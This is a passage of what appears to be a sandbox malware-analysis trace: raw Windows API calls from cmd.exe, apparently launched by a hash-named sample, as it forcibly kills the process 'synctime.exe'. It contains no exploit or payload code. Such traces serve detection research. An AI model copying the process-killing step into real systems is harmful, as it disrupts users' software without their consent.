lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0159.741] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0159.742] RegCloseKey (hKey=0x88) returned 0x0 [0159.742] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0159.742] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0159.742] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0159.742] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0159.742] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0159.742] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0159.742] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0159.742] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0159.743] RegCloseKey (hKey=0x88) returned 0x0 [0159.743] time (in: timer=0x0 | out: timer=0x0) returned 0x6234420e [0159.743] srand (_Seed=0x6234420e) [0159.743] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im synctime.exe \"" [0159.743] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im synctime.exe \"" [0159.743] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0159.743] GetProcessHeap () returned 0x440000 [0159.743] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x210) returned 0x449b38 [0159.743] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x449b40, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0159.743] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0159.743] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0159.743] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0159.744] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0159.744] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0159.744] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0159.744] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0159.744] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0159.744] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0159.744] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0159.744] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0159.744] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0159.745] GetProcessHeap () returned 0x440000 [0159.745] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x4486e8) returned 1 [0159.745] GetEnvironmentStringsW () returned 0x447cc0* [0159.745] GetProcessHeap () returned 0x440000 [0159.745] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xa32) returned 0x44a790 [0159.746] FreeEnvironmentStringsA (penv="A") returned 1 [0159.746] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0159.746] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0159.746] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0159.746] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0159.746] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0159.746] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0159.746] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0159.746] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0159.746] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0159.746] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0159.746] GetProcessHeap () returned 0x440000 [0159.746] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x44) returned 0x4405c8 [0159.746] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0159.747] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0159.747] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0159.747] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x440618 [0159.747] FindClose (in: hFindFile=0x440618 | out: hFindFile=0x440618) returned 1 [0159.748] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x440618 [0159.748] FindClose (in: hFindFile=0x440618 | out: hFindFile=0x440618) returned 1 [0159.748] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0159.748] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x440618 [0159.748] FindClose (in: hFindFile=0x440618 | out: hFindFile=0x440618) returned 1 [0159.749] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0159.749] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0159.749] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0159.749] GetProcessHeap () returned 0x440000 [0159.749] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x44a790) returned 1 [0159.749] GetEnvironmentStringsW () returned 0x447cc0* [0159.750] GetProcessHeap () returned 0x440000 [0159.750] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xa76) returned 0x449d50 [0159.750] FreeEnvironmentStringsA (penv="=") returned 1 [0159.750] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0159.750] GetProcessHeap () returned 0x440000 [0159.750] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x4405c8) returned 1 [0159.750] GetProcessHeap () returned 0x440000 [0159.750] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x400e) returned 0x44bc50 [0159.751] GetProcessHeap () returned 0x440000 [0159.751] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x4c) returned 0x44a7d0 [0159.751] GetProcessHeap () returned 0x440000 [0159.751] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x4008) returned 0x44fc68 [0159.757] GetProcessHeap () returned 0x440000 [0159.757] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x4008) returned 0x453c78 [0159.759] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0159.759] GetProcessHeap () returned 0x440000 [0159.759] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x418) returned 0x44a828 [0159.760] SetErrorMode (uMode=0x0) returned 0x8003 [0159.760] SetErrorMode (uMode=0x1) returned 0x0 [0159.760] GetFullPathNameW (in: lpFileName="taskkill \\f \\.", nBufferLength=0x208, lpBuffer=0x44a830, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f", lpFilePart=0x19fbac*="f") returned 0x29 [0159.760] SetErrorMode (uMode=0x8003) returned 0x1 [0159.760] GetProcessHeap () returned 0x440000 [0159.760] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x44a828, Size=0x7e) returned 0x44a828 [0159.760] GetProcessHeap () returned 0x440000 [0159.760] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x44a828) returned 0x7e [0159.760] NeedCurrentDirectoryForExePathW (ExeName="taskkill \\f \\.") returned 1 [0159.760] GetProcessHeap () returned 0x440000 [0159.760] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x62) returned 0x44a8b0 [0159.760] GetProcessHeap () returned 0x440000 [0159.760] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xb8) returned 0x44a920 [0159.761] GetProcessHeap () returned 0x440000 [0159.761] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x44a920, Size=0x62) returned 0x44a920 [0159.761] GetProcessHeap () returned 0x440000 [0159.761] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x44a920) returned 0x62 [0159.761] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0159.761] GetProcessHeap () returned 0x440000 [0159.761] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xe0) returned 0x44a990 [0159.766] GetProcessHeap () returned 0x440000 [0159.766] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x44a990, Size=0x76) returned 0x44a990 [0159.766] GetProcessHeap () returned 0x440000 [0159.766] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x44a990) returned 0x76 [0159.767] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0159.767] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f\\im synctime.exe ", fInfoLevelId=0x1, lpFindFileData=0x19f958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f958) returned 0xffffffff [0159.767] GetLastError () returned 0x3 [0159.767] GetProcessHeap () returned 0x440000 [0159.768] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x44fc68) returned 1 [0159.769] GetProcessHeap () returned 0x440000 [0159.769] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x453c78) returned 1 [0159.769] GetProcessHeap () returned 0x440000 [0159.770] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x44bc50) returned 1 [0159.770] GetConsoleOutputCP () returned 0x1b5 [0159.775] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0159.775] GetUserDefaultLCID () returned 0x409 [0159.776] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0159.776] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0159.776] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0159.776] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0159.776] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0159.776] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0159.776] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0159.776] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0159.776] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0159.777] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0159.777] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0159.777] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0159.777] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0159.777] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0159.777] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0159.779] GetProcessHeap () returned 0x440000 [0159.779] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x20c) returned 0x44aa58 [0159.779] GetConsoleTitleW (in: lpConsoleTitle=0x44aa58, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0159.784] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0159.784] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0159.784] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0159.784] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0159.785] GetProcessHeap () returned 0x440000 [0159.785] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x400a) returned 0x44bc50 [0159.785] GetProcessHeap () returned 0x440000 [0159.785] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x44bc50) returned 1 [0159.787] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0159.787] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0159.787] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0159.787] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0159.787] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0159.787] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0159.787] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0159.787] GetProcessHeap () returned 0x440000 [0159.787] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x58) returned 0x44ac70 [0159.787] GetProcessHeap () returned 0x440000 [0159.787] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x1a) returned 0x440578 [0159.788] GetProcessHeap () returned 0x440000 [0159.788] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x34) returned 0x44acd0 [0159.789] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0159.798] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0159.798] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0159.798] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0159.799] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0159.799] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0159.799] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0159.799] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0159.799] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0159.799] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0159.799] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0159.799] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0159.799] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0159.799] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0159.799] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0159.799] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0159.799] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0159.799] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0159.799] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0159.799] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0159.799] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0159.799] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0159.799] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0159.799] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0159.799] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0159.799] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0159.800] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0159.800] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0159.800] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0159.800] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0159.800] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0159.800] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0159.800] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0159.800] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0159.800] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0159.800] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0159.800] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0159.800] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0159.800] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0159.800] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0159.800] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0159.800] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0159.800] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0159.800] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0159.800] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0159.800] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0159.800] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0159.801] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0159.801] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0159.801] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0159.801] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0159.801] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0159.801] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0159.801] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0159.801] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0159.801] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0159.801] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0159.801] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0159.801] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0159.801] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0159.801] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0159.801] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0159.801] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0159.801] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0159.801] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0159.802] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0159.802] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0159.802] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0159.802] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0159.802] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0159.804] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0159.804] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0159.804] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0159.804] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0159.804] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0159.804] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0159.804] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0159.804] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0159.804] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0159.804] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0159.804] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0159.804] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0159.804] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0159.804] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0159.804] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0159.804] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0159.804] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0159.804] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0159.805] GetProcessHeap () returned 0x440000 [0159.805] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x210) returned 0x44ad10 [0159.805] GetProcessHeap () returned 0x440000 [0159.805] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x46) returned 0x44af28 [0159.805] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0159.806] GetProcessHeap () returned 0x440000 [0159.806] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x418) returned 0x4405c8 [0159.806] SetErrorMode (uMode=0x0) returned 0x8003 [0159.806] SetErrorMode (uMode=0x1) returned 0x0 [0159.806] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4405d0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0159.806] SetErrorMode (uMode=0x8003) returned 0x1 [0159.806] GetProcessHeap () returned 0x440000 [0159.806] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x4405c8, Size=0x56) returned 0x4405c8 [0159.807] GetProcessHeap () returned 0x440000 [0159.807] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x4405c8) returned 0x56 [0159.807] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0159.807] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0159.807] GetProcessHeap () returned 0x440000 [0159.807] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x110) returned 0x44af78 [0159.807] GetProcessHeap () returned 0x440000 [0159.807] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x218) returned 0x440628 [0159.813] GetProcessHeap () returned 0x440000 [0159.813] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x440628, Size=0x112) returned 0x440628 [0159.813] GetProcessHeap () returned 0x440000 [0159.813] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x440628) returned 0x112 [0159.813] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0159.813] GetProcessHeap () returned 0x440000 [0159.813] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xe0) returned 0x44b090 [0159.815] GetProcessHeap () returned 0x440000 [0159.815] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x44b090, Size=0x76) returned 0x44b090 [0159.815] GetProcessHeap () returned 0x440000 [0159.815] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x44b090) returned 0x76 [0159.816] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0159.816] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0159.816] GetLastError () returned 0x2 [0159.816] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0159.817] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x44b110 [0159.817] GetProcessHeap () returned 0x440000 [0159.817] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x14) returned 0x4477a8 [0159.817] FindClose (in: hFindFile=0x44b110 | out: hFindFile=0x44b110) returned 1 [0159.817] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0159.818] GetLastError () returned 0x2 [0159.818] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", 